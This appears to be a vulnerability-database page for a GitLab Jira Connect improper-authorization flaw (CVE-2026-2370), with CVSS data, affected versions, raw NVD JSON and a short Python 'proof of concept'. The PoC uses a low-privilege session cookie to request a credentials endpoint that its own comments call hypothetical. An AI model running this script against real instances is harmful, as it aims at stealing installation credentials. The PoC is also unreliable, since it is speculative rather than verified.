Security Vulnerability Report
中文
CVE-2026-2370 CVSS 8.1 HIGH

CVE-2026-2370

Published: 2026-03-30 00:16:02
Last Modified: 2026-03-30 15:44:27
Source: [email protected]

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 14.3 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1 affecting Jira Connect installations that could have allowed an authenticated user with minimal workspace permissions to obtain installation credentials and impersonate the GitLab app due to improper authorization checks.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:community:*:*:* - VULNERABLE
GitLab CE/EE >= 14.3, < 18.8.7
GitLab CE/EE >= 18.9, < 18.9.3
GitLab CE/EE >= 18.10, < 18.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-2370 Proof of Concept # Description: Exploit improper authorization to leak Jira Connect credentials. # Requirements: Valid low-privilege GitLab session cookie. target = "https://gitlab.target.com" attacker_cookie = "_gitlab_session=valid_low_priv_user_session" headers = { "User-Agent": "Mozilla/5.0", "Cookie": attacker_cookie } # Hypothetical endpoint exposing the installation secret # Actual endpoint path may vary based on specific GitLab version and routing url = f"{target}/jira_connect/installations/1/credentials" try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit Successful!") print("[+] Leaked Credentials:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2370", "sourceIdentifier": "[email protected]", "published": "2026-03-30T00:16:01.800", "lastModified": "2026-03-30T15:44:26.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 14.3 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1 affecting Jira Connect installations that could have allowed an authenticated user with minimal workspace permissions to obtain installation credentials and impersonate the GitLab app due to improper authorization checks."}, {"lang": "es", "value": "GitLab ha remediado un problema en GitLab CE/EE que afecta a todas las versiones desde la 14.3 anteriores a la 18.8.7, la 18.9 anteriores a la 18.9.3 y la 18.10 anteriores a la 18.10.1, y que afecta a las instalaciones de Jira Connect, que podría haber permitido a un usuario autenticado con permisos mínimos de espacio de trabajo obtener credenciales de instalación e suplantar la aplicación de GitLab debido a comprobaciones de autorización incorrectas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-233"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "14.3.0", "versionEndExcluding": "18.8.7", "matchCriteriaId": "22F9C9B9-964C-421E-8CB5-B2FBE5E5A84F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "14.3.0", "versionEndExcluding": "18.8.7", "matchCriteriaId": "F419394A-3E12-4548-BD49-FF5027B9CFF7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.3", "matchCriteriaId": "96F7E7EC-4C2E-4A48-8134-9262B251C89C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.3", "matchCriteriaId": "C3240349-67A3-43E2-BAD9-EFAA3E0A5D31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:community:*:*:*", "matchCriteriaId": "D5B6ECC9-6AEA-4DD0-B12B-A3A7A9FE91DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "2B8DF779-B99E-4096-B734-78AB1849D136"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/03/25/patch-release-gitlab-18-10-1-released/", "source": "[email protected]", "tags": ["Patch", "Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/589635", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3522829", "source": "[email protected]", "tags": ["Permissions Required"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.